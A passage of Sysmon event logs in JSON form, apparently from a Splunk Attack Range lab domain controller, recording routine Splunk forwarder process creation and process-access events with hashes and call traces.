Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3856,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.959\r\nProcessGuid: {41C8662E-1FFF-5F25-0000-0010F9D40500}\r\nProcessId: 4436\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.959","ProcessGuid":"{41C8662E-1FFF-5F25-0000-0010F9D40500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3857,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FFF-5F25-0000-0010F9D40500}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FFF-5F25-0000-0010F9D40500}","TargetProcessId":"4436","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3858,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FFF-5F25-0000-0010F9D40500}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FFF-5F25-0000-0010F9D40500}","TargetProcessId":"4436","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3859,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3860,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3861,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3862,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3863,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:43.958","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3864,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:43.958\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 